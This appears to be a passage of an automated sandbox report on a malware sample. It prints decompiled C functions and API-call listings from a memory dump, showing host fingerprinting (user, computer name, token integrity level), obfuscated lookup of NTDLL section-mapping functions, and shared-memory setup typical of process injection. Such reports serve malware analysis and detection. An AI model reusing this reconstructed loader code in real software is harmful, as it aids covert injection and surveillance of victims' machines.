                                                                                    • Part of subcall function 033FA590: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 033FA5BB
                                                                                  • GetModuleHandleA.KERNEL32(4E52454B,05F28CE5,73797325), ref: 033F7EE3
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 033F7EEA
                                                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 033F7F04
                                                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 033F7F22
                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 033F7F31
                                                                                  • CloseHandle.KERNEL32(?), ref: 033F7F36
                                                                                  • GetLastError.KERNEL32 ref: 033F7F3A
                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 033F7F56
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Wow64$Handle$CloseEnableEnvironmentExpandModuleRedirectionStrings$ChangeErrorFindFreeHeapLastNotificationmemcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 2409638872-0
                                                                                  • Opcode ID: 310c20d8050b759925dafd10ba390a96ce3beb536aca7ab1832b0e11fe336d3b
                                                                                  • Instruction ID: 944f2705e6b327f63934220e7c3bf722beac03778ac36bb9d891dd4d559e38c2
                                                                                  • Opcode Fuzzy Hash: 310c20d8050b759925dafd10ba390a96ce3beb536aca7ab1832b0e11fe336d3b
                                                                                  • Instruction Fuzzy Hash: 17413776901219BFCB11EFA4DC88DDEBFBCEF08380F504161E615A7124D775AA45DBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 74%
                                                                                  			E033F12E8(intOrPtr __edx, void** _a4, void** _a8) {
                                                                                  				intOrPtr _v8;
                                                                                  				struct _FILETIME* _v12;
                                                                                  				short _v56;
                                                                                  				struct _FILETIME* _t12;
                                                                                  				intOrPtr _t13;
                                                                                  				void* _t17;
                                                                                  				void* _t21;
                                                                                  				intOrPtr _t27;
                                                                                  				long _t28;
                                                                                  				void* _t30;
                                                                                  
                                                                                  				_t27 = __edx;
                                                                                  				_t12 =  &_v12;
                                                                                  				GetSystemTimeAsFileTime(_t12);
                                                                                  				_push(0x192);
                                                                                  				_push(0x54d38000);
                                                                                  				_push(_v8);
                                                                                  				_push(_v12);
                                                                                  				L033FAEDA();
                                                                                  				_push(_t12);
                                                                                  				_v12 = _t12;
                                                                                  				_t13 =  *0x33fd230; // 0x2b2a5a8
                                                                                  				_t5 = _t13 + 0x33fe84d; // 0x5f28df5
                                                                                  				_t6 = _t13 + 0x33fe580; // 0x530025
                                                                                  				_push(0x16);
                                                                                  				_push( &_v56);
                                                                                  				_v8 = _t27;
                                                                                  				L033FABFA();
                                                                                  				_t17 = CreateFileMappingW(0xffffffff, 0x33fd234, 4, 0, 0x1000,  &_v56); // executed
                                                                                  				_t30 = _t17;
                                                                                  				if(_t30 == 0) {
                                                                                  					_t28 = GetLastError();
                                                                                  				} else {
                                                                                  					if(GetLastError() == 0xb7) {
                                                                                  						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                                                  						if(_t21 == 0) {
                                                                                  							_t28 = GetLastError();
                                                                                  							if(_t28 != 0) {
                                                                                  								goto L6;
                                                                                  							}
                                                                                  						} else {
                                                                                  							 *_a4 = _t30;
                                                                                  							 *_a8 = _t21;
                                                                                  							_t28 = 0;
                                                                                  						}
                                                                                  					} else {
                                                                                  						_t28 = 2;
                                                                                  						L6:
                                                                                  						CloseHandle(_t30);
                                                                                  					}
                                                                                  				}
                                                                                  				return _t28;
                                                                                  			}














                                                                                  APIs
                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,033F7881,?,00000001,?), ref: 033F12F4
                                                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 033F130A
                                                                                  • _snwprintf.NTDLL ref: 033F132F
                                                                                  • CreateFileMappingW.KERNELBASE(000000FF,033FD234,00000004,00000000,00001000,?), ref: 033F134B
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,033F7881,?), ref: 033F135D
                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 033F1374
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,033F7881), ref: 033F1395
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,033F7881,?), ref: 033F139D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1814172918-0
                                                                                  • Opcode ID: a61c987956156e934b03a70d52735f80432689bfd9132fc0e5d42de805636e8b
                                                                                  • Instruction ID: db37c0cea0cb824b84bf0310afe834ea5069dca80b8cb7eead5645fe688255d6
                                                                                  • Opcode Fuzzy Hash: a61c987956156e934b03a70d52735f80432689bfd9132fc0e5d42de805636e8b
                                                                                  • Instruction Fuzzy Hash: 2621F076A40208FFD710EB94DC89F9D77ADEB44710FA40122FB05EB1C0D670D5068B60
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 64%
                                                                                  			E033F77EB(signed int __edx) {
                                                                                  				signed int _v8;
                                                                                  				long _v12;
                                                                                  				signed int _v16;
                                                                                  				long _v20;
                                                                                  				void* _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				intOrPtr _v36;
                                                                                  				char _v40;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				void* _t27;
                                                                                  				long _t28;
                                                                                  				long _t31;
                                                                                  				intOrPtr _t32;
                                                                                  				void* _t36;
                                                                                  				signed int _t37;
                                                                                  				intOrPtr _t38;
                                                                                  				void* _t39;
                                                                                  				CHAR* _t42;
                                                                                  				long _t48;
                                                                                  				long _t49;
                                                                                  				void* _t54;
                                                                                  				void* _t56;
                                                                                  				intOrPtr _t64;
                                                                                  				void* _t67;
                                                                                  				long _t71;
                                                                                  				void* _t72;
                                                                                  				signed char _t74;
                                                                                  				intOrPtr _t76;
                                                                                  				signed int _t77;
                                                                                  				long _t82;
                                                                                  				long _t84;
                                                                                  				CHAR* _t87;
                                                                                  				void* _t88;
                                                                                  
                                                                                  				_t79 = __edx;
                                                                                  				_v16 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_t27 = E033F8B76();
                                                                                  				if(_t27 != 0) {
                                                                                  					_t77 =  *0x33fd214; // 0x4000000a
                                                                                  					_t73 = (_t77 & 0xf0000000) + _t27;
                                                                                  					 *0x33fd214 = (_t77 & 0xf0000000) + _t27;
                                                                                  				}
                                                                                  				_t28 =  *0x33fd134(0, 2);
                                                                                  				_v20 = _t28;
                                                                                  				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
                                                                                  					_t31 = E033F82D9( &_v8,  &_v16); // executed
                                                                                  					_push(0);
                                                                                  					_t84 = _t31;
                                                                                  					_t32 =  *0x33fd230; // 0x2b2a5a8
                                                                                  					_push(0x33fd238);
                                                                                  					_push(1);
                                                                                  					_t7 = _t32 + 0x33fe5bc; // 0x4d283a53
                                                                                  					 *0x33fd234 = 0xc;
                                                                                  					 *0x33fd23c = 0;
                                                                                  					L033F73FE();
                                                                                  					_t36 = E033F12E8(_t79,  &_v24,  &_v12); // executed
                                                                                  					if(_t36 == 0) {
                                                                                  						CloseHandle(_v24);
                                                                                  					}
                                                                                  					if(_t84 != 5) {
                                                                                  						_t37 = _v16;
                                                                                  						__eflags = _t37;
                                                                                  						if(_t37 != 0) {
                                                                                  							E033FA12A(_t37 ^ 0xe8fa7dd7,  &_v40);
                                                                                  							_t87 = E033F75C4(0x27);
                                                                                  							__eflags = _t87;
                                                                                  							if(_t87 != 0) {
                                                                                  								asm("bswap eax");
                                                                                  								asm("bswap eax");
                                                                                  								asm("bswap eax");
                                                                                  								asm("bswap eax");
                                                                                  								_t64 =  *0x33fd230; // 0x2b2a5a8
                                                                                  								_t18 = _t64 + 0x33fe916; // 0x78383025
                                                                                  								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
                                                                                  								_t88 = _t88 + 0x18;
                                                                                  							}
                                                                                  							 *0x33fd288 = _t87;
                                                                                  						}
                                                                                  						_t38 = E033FA667();
                                                                                  						 *0x33fd228 =  *0x33fd228 ^ 0xe8fa7dd7;
                                                                                  						 *0x33fd278 = _t38;
                                                                                  						_t39 = E033F75C4(0x60);
                                                                                  						__eflags = _t39;
                                                                                  						 *0x33fd2dc = _t39;
                                                                                  						if(_t39 == 0) {
                                                                                  							_t84 = 8;
                                                                                  						} else {
                                                                                  							memset(_t39, 0, 0x60);
                                                                                  							_t54 =  *0x33fd2dc; // 0x5f29630
                                                                                  							_t88 = _t88 + 0xc;
                                                                                  							__imp__(_t54 + 0x40);
                                                                                  							_t56 =  *0x33fd2dc; // 0x5f29630
                                                                                  							 *_t56 = 0x33fe882;
                                                                                  							_t84 = 0;
                                                                                  						}
                                                                                  						__eflags = _t84;
                                                                                  						if(_t84 == 0) {
                                                                                  							_t42 = RtlAllocateHeap( *0x33fd1f0, _t84, 0x52);
                                                                                  							__eflags = _t42;
                                                                                  							 *0x33fd270 = _t42;
                                                                                  							if(_t42 == 0) {
                                                                                  								_t84 = 8;
                                                                                  							} else {
                                                                                  								_t74 =  *0x33fd214; // 0x4000000a
                                                                                  								_t79 = _t74 & 0x000000ff;
                                                                                  								_t76 =  *0x33fd230; // 0x2b2a5a8
                                                                                  								_t19 = _t76 + 0x33fe212; // 0x697a6f4d
                                                                                  								_t73 = _t19;
                                                                                  								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x33fc2bf);
                                                                                  							}
                                                                                  							__eflags = _t84;
                                                                                  							if(_t84 == 0) {
                                                                                  								asm("sbb eax, eax");
                                                                                  								E033FA12A( ~_v8 &  *0x33fd228, 0x33fd00c); // executed
                                                                                  								_t84 = E033F58CA(_t73);
                                                                                  								__eflags = _t84;
                                                                                  								if(_t84 != 0) {
                                                                                  									goto L31;
                                                                                  								}
                                                                                  								_t48 = E033F7098(_t73); // executed
                                                                                  								__eflags = _t48;
                                                                                  								if(_t48 != 0) {
                                                                                  									__eflags = _v8;
                                                                                  									_t82 = _v12;
                                                                                  									if(_v8 != 0) {
                                                                                  										L30:
                                                                                  										_t49 = E033F37CA(_t79, _t82, _v8); // executed
                                                                                  										_t84 = _t49;
                                                                                  										goto L31;
                                                                                  									}
                                                                                  									__eflags = _t82;
                                                                                  									if(__eflags == 0) {
                                                                                  										goto L31;
                                                                                  									}
                                                                                  									_t23 = _t82 + 4; // 0x5
                                                                                  									_t84 = E033F8BA5(__eflags, _t23);
                                                                                  									__eflags = _t84;
                                                                                  									if(_t84 == 0) {
                                                                                  										goto L31;
                                                                                  									}
                                                                                  									goto L30;
                                                                                  								}
                                                                                  								_t84 = 8;
                                                                                  							}
                                                                                  						}
                                                                                  					} else {
                                                                                  						_t71 = _v12;
                                                                                  						if(_t71 == 0) {
                                                                                  							L31:
                                                                                  							if(_v20 == 0 || _v20 == 1) {
                                                                                  								 *0x33fd130(); // executed
                                                                                  							}
                                                                                  							goto L35;
                                                                                  						}
                                                                                  						_t72 = _t71 + 4;
                                                                                  						do {
                                                                                  							_push(1);
                                                                                  							_push(_t72);
                                                                                  							_t67 = 5;
                                                                                  						} while (E033F3267(_t67, 0) == 0x4c7);
                                                                                  					}
                                                                                  					goto L31;
                                                                                  				} else {
                                                                                  					_t84 = _t28;
                                                                                  					L35:
                                                                                  					return _t84;
                                                                                  				}
                                                                                  			}







































                                                                                  APIs
                                                                                    • Part of subcall function 033F8B76: GetModuleHandleA.KERNEL32(4C44544E,00000000,033F7804,00000000,00000000,00000000,?,?,?,?,?,033F87DD,?,00000001), ref: 033F8B85
                                                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,033FD238,00000000), ref: 033F786F
                                                                                  • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,033F87DD,?,00000001), ref: 033F7888
                                                                                  • wsprintfA.USER32 ref: 033F7908
                                                                                  • memset.NTDLL ref: 033F7938
                                                                                  • RtlInitializeCriticalSection.NTDLL(05F295F0), ref: 033F7949
                                                                                  • RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 033F7972
                                                                                  • wsprintfA.USER32 ref: 033F79A2
                                                                                    • Part of subcall function 033FA12A: GetUserNameW.ADVAPI32(00000000,033F79C7), ref: 033FA161
                                                                                    • Part of subcall function 033FA12A: RtlAllocateHeap.NTDLL(00000000,033F79C7), ref: 033FA178
                                                                                    • Part of subcall function 033FA12A: GetUserNameW.ADVAPI32(00000000,033F79C7), ref: 033FA185
                                                                                    • Part of subcall function 033FA12A: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,033F79C7,?,?,?,?,?,033F87DD,?,00000001), ref: 033FA1A6
                                                                                    • Part of subcall function 033FA12A: GetComputerNameW.KERNEL32(00000000,00000000), ref: 033FA1CD
                                                                                    • Part of subcall function 033FA12A: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 033FA1E1
                                                                                    • Part of subcall function 033FA12A: GetComputerNameW.KERNEL32(00000000,00000000), ref: 033FA1EE
                                                                                    • Part of subcall function 033FA12A: HeapFree.KERNEL32(00000000,00000000), ref: 033FA20C
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
                                                                                  • String ID:
                                                                                  • API String ID: 2910951584-0
                                                                                  • Opcode ID: 64c6782a96fa2899a7a88dba97bbca498d61618690aa70b26a17a0737b4b1809
                                                                                  • Instruction ID: 96b7d9767d3aebf0a6cf71939643d1923de57baa6193d4879dbb3b48efcf171c
                                                                                  • Opcode Fuzzy Hash: 64c6782a96fa2899a7a88dba97bbca498d61618690aa70b26a17a0737b4b1809
                                                                                  • Instruction Fuzzy Hash: FC511771D40205AFDB21EB68DCC8FAEB7BCEB08390FC50515EA04EB248D775D9018BA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E033F9FC0(long* _a4) {
                                                                                  				long _v8;
                                                                                  				void* _v12;
                                                                                  				void _v16;
                                                                                  				long _v20;
                                                                                  				int _t33;
                                                                                  				void* _t46;
                                                                                  
                                                                                  				_v16 = 1;
                                                                                  				_v20 = 0x2000;
                                                                                  				if( *0x33fd214 > 5) {
                                                                                  					_v16 = 0;
                                                                                  					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                                                  						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                                                  						_v8 = 0;
                                                                                  						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                                                  						if(_v8 != 0) {
                                                                                  							_t46 = E033F75C4(_v8);
                                                                                  							if(_t46 != 0) {
                                                                                  								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                                                  								if(_t33 != 0) {
                                                                                  									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                                                  								}
                                                                                  								E033F4C31(_t46);
                                                                                  							}
                                                                                  						}
                                                                                  						CloseHandle(_v12);
                                                                                  					}
                                                                                  				}
                                                                                  				 *_a4 = _v20;
                                                                                  				return _v16;
                                                                                  			}









                                                                                  APIs
                                                                                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 033F9FF2
                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 033FA012
                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 033FA022
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 033FA072
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 033FA045
                                                                                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 033FA04D
                                                                                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 033FA05D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1295030180-0
                                                                                  • Opcode ID: 2eb26b84f23e657da9a2e467d96a7cf4298237cad83e1f396404fb04449120cb
                                                                                  • Instruction ID: e1724c9fc989406fc5d393966a8ef5481b875629546415919523f4cf70f4c67d
                                                                                  • Opcode Fuzzy Hash: 2eb26b84f23e657da9a2e467d96a7cf4298237cad83e1f396404fb04449120cb
                                                                                  • Instruction Fuzzy Hash: 34213D7590020EFFEB10EFA4DC84EEEBBBDEB04304F4400A5EA10A6255C7759A45EF60
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 033F496C
                                                                                  • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 033F49EE
                                                                                  • StrStrIW.SHLWAPI(00000000,006E0069), ref: 033F4A2D
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 033F4A4F
                                                                                    • Part of subcall function 033F14BD: SysAllocString.OLEAUT32(033FC2C8), ref: 033F150D
                                                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 033F4AA3
                                                                                  • SysFreeString.OLEAUT32(?), ref: 033F4AB1
                                                                                    • Part of subcall function 033F13AD: Sleep.KERNELBASE(000001F4), ref: 033F13F5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                                                  • String ID:
                                                                                  • API String ID: 2118684380-0
                                                                                  • Opcode ID: 6876993aa914fe624bb9b03df57be59a804dfb6466049c00dbbf0f2a8e5381a3
                                                                                  • Instruction ID: 382233400c3893bb952940f00bc4bfbd17e81a41a01f30a20ebfbacce0eb8867
                                                                                  • Opcode Fuzzy Hash: 6876993aa914fe624bb9b03df57be59a804dfb6466049c00dbbf0f2a8e5381a3
                                                                                  • Instruction Fuzzy Hash: 0E510E7690020AEFDF00DFA5C8C48AEB7BAFF88300B558969E615EB224D735DD45CB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 033F4AC1: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,05F289D0,033F841C,?,?,?,?,?,?,?,?,?,?,?,033F841C), ref: 033F4B8D
                                                                                    • Part of subcall function 033F7004: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 033F7041
                                                                                    • Part of subcall function 033F7004: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 033F7072
                                                                                  • SysAllocString.OLEAUT32(?), ref: 033F8448
                                                                                  • SysAllocString.OLEAUT32(0070006F), ref: 033F845C
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 033F846E
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 033F84D2
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 033F84E1
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 033F84EC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                                                                  • String ID:
                                                                                  • API String ID: 2831207796-0
                                                                                  • Opcode ID: 27318bff127fb2f650ddcc64d6d64155364bf792a71e44a77d22e6ed58b99169
                                                                                  • Instruction ID: 3ab2ec7238cf52466a7bf644da8cf466b558cb1f7423fff01f5affca1bde1ed7
                                                                                  • Opcode Fuzzy Hash: 27318bff127fb2f650ddcc64d6d64155364bf792a71e44a77d22e6ed58b99169
                                                                                  • Instruction Fuzzy Hash: 0B315232D00A09AFDB01EFB8C88899FB7BAEF49310F554465EE10EB110DB75D946CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E033F40AF(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _t23;
                                                                                  				intOrPtr _t26;
                                                                                  				_Unknown_base(*)()* _t28;
                                                                                  				intOrPtr _t30;
                                                                                  				_Unknown_base(*)()* _t32;
                                                                                  				intOrPtr _t33;
                                                                                  				_Unknown_base(*)()* _t35;
                                                                                  				intOrPtr _t36;
                                                                                  				_Unknown_base(*)()* _t38;
                                                                                  				intOrPtr _t39;
                                                                                  				_Unknown_base(*)()* _t41;
                                                                                  				intOrPtr _t44;
                                                                                  				struct HINSTANCE__* _t48;
                                                                                  				intOrPtr _t54;
                                                                                  
                                                                                  				_t54 = E033F75C4(0x20);
                                                                                  				if(_t54 == 0) {
                                                                                  					_v8 = 8;
                                                                                  				} else {
                                                                                  					_t23 =  *0x33fd230; // 0x2b2a5a8
                                                                                  					_t1 = _t23 + 0x33fe11a; // 0x4c44544e
                                                                                  					_t48 = GetModuleHandleA(_t1);
                                                                                  					_t26 =  *0x33fd230; // 0x2b2a5a8
                                                                                  					_t2 = _t26 + 0x33fe787; // 0x7243775a
                                                                                  					_v8 = 0x7f;
                                                                                  					_t28 = GetProcAddress(_t48, _t2);
                                                                                  					 *(_t54 + 0xc) = _t28;
                                                                                  					if(_t28 == 0) {
                                                                                  						L8:
                                                                                  						E033F4C31(_t54);
                                                                                  					} else {
                                                                                  						_t30 =  *0x33fd230; // 0x2b2a5a8
                                                                                  						_t5 = _t30 + 0x33fe774; // 0x614d775a
                                                                                  						_t32 = GetProcAddress(_t48, _t5);
                                                                                  						 *(_t54 + 0x10) = _t32;
                                                                                  						if(_t32 == 0) {
                                                                                  							goto L8;
                                                                                  						} else {
                                                                                  							_t33 =  *0x33fd230; // 0x2b2a5a8
                                                                                  							_t7 = _t33 + 0x33fe797; // 0x6e55775a
                                                                                  							_t35 = GetProcAddress(_t48, _t7);
                                                                                  							 *(_t54 + 0x14) = _t35;
                                                                                  							if(_t35 == 0) {
                                                                                  								goto L8;
                                                                                  							} else {
                                                                                  								_t36 =  *0x33fd230; // 0x2b2a5a8
                                                                                  								_t9 = _t36 + 0x33fe756; // 0x4e6c7452
                                                                                  								_t38 = GetProcAddress(_t48, _t9);
                                                                                  								 *(_t54 + 0x18) = _t38;
                                                                                  								if(_t38 == 0) {
                                                                                  									goto L8;
                                                                                  								} else {
                                                                                  									_t39 =  *0x33fd230; // 0x2b2a5a8
                                                                                  									_t11 = _t39 + 0x33fe7ac; // 0x6c43775a
                                                                                  									_t41 = GetProcAddress(_t48, _t11);
                                                                                  									 *(_t54 + 0x1c) = _t41;
                                                                                  									if(_t41 == 0) {
                                                                                  										goto L8;
                                                                                  									} else {
                                                                                  										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                  										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                  										_t44 = E033F4F73(_t54, _a8); // executed
                                                                                  										_v8 = _t44;
                                                                                  										if(_t44 != 0) {
                                                                                  											goto L8;
                                                                                  										} else {
                                                                                  											 *_a12 = _t54;
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}


















                                                                                  APIs
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,033F7E5B,?,?,?,?,00000000,00000000), ref: 033F40D4
                                                                                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 033F40F6
                                                                                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 033F410C
                                                                                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 033F4122
                                                                                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 033F4138
                                                                                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 033F414E
                                                                                    • Part of subcall function 033F4F73: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,033F416E), ref: 033F4FD0
                                                                                    • Part of subcall function 033F4F73: memset.NTDLL ref: 033F4FF2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                                                                  • String ID:
                                                                                  • API String ID: 3012371009-0
                                                                                  • Opcode ID: abc068529e6d373c44c6f475e41414c55d987184a1220fbd3e428a9404e99c74
                                                                                  • Instruction ID: 513986b830b651d635d0c5ffdbed616fa8f712c1b1c52ff73f971e39d2e25746
                                                                                  • Opcode Fuzzy Hash: abc068529e6d373c44c6f475e41414c55d987184a1220fbd3e428a9404e99c74
                                                                                  • Instruction Fuzzy Hash: 07214FB150030AAFD750EFAACDC8E5B77ECEB08740B844625FA05C7654E734E9058BB0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 79%
                                                                                  			E033F1650(void* __eax, void* _a4, char* _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
                                                                                  				char _v5;
                                                                                  				signed int _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				char _t28;
                                                                                  				void* _t33;
                                                                                  				void* _t36;
                                                                                  				void* _t41;
                                                                                  				char* _t42;
                                                                                  				void* _t44;
                                                                                  				char* _t49;
                                                                                  				char* _t50;
                                                                                  				int _t51;
                                                                                  				int _t54;
                                                                                  				void* _t55;
                                                                                  
                                                                                  				_t49 = _a4;
                                                                                  				_t55 = __eax;
                                                                                  				_v12 = 0xb;
                                                                                  				if(_t49 != 0 && __eax != 0) {
                                                                                  					_t5 = _t55 - 1; // -1
